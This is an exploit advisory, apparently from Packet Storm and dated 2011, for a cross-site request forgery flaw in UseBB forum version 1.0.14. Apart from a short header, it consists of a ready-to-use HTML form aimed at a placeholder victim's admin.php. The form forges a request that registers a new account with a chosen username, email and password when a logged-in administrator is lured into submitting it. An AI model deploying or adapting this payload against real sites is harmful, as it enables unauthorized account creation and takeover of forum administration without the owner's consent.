UseBB Forum version 1.0.14 suffers from a cross site request forgery vulnerability.
9af21b91ae8876e6b4a35b96e4811e8405fdd1ffd49025453b5bb750ad6e5c4bUseBB 1.0.14 CSRF Vulnerability
Author : Muhammet Cagri Tepebasili
Date : 11.12.2011
Script & Demo : UseBB http://demo.opensourcecms.com/usebb/index.php
Software: http://www.usebb.net/
Version : 1.0.14
Tested On : Linux Mint 11
Exploit :
<label><b>UseBB 1.0.14 CSRF Vulnerability | Author : Muhammet Cagri
Tepebasili</b></label><br>
<label> Note : Your Password must be min 8 charecter.</label><br>
<cagritepebasili>
<form action="[Victim]/admin.php" method="post">
<table id="adminregulartable">
<tr><td class="fieldtitle">Username
<small>*</small></td><td>
<input type="text" size="30" name="name" id="name" maxlength="255" value=""
/><div class="moreinfo">
</div></td></tr>
<tr><td class="fieldtitle">Email
<small>*</small></td><td><input type="text" size="30" name="email"
maxlength="255" value=""/></td></tr>
<tr><td class="fieldtitle">Password
<small>*</small></td><td><input type="password" size="30" name="passwd1"
maxlength="255" /><div class="moreinfo"></div></td></tr>
<tr><td class="fieldtitle">
<small>*</small></td><td><input type="password" size="30" name="passwd2"
maxlength="255" /></td></tr>
<tr><td colspan="2" class="submit"><input type="submit" value="Register"
/><input type="reset" value="Reset" /></td></tr></table></form>
</cagritepebasili>
Greetz : Eymen Sen , Cafer K.Sezer and Baris Turan
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed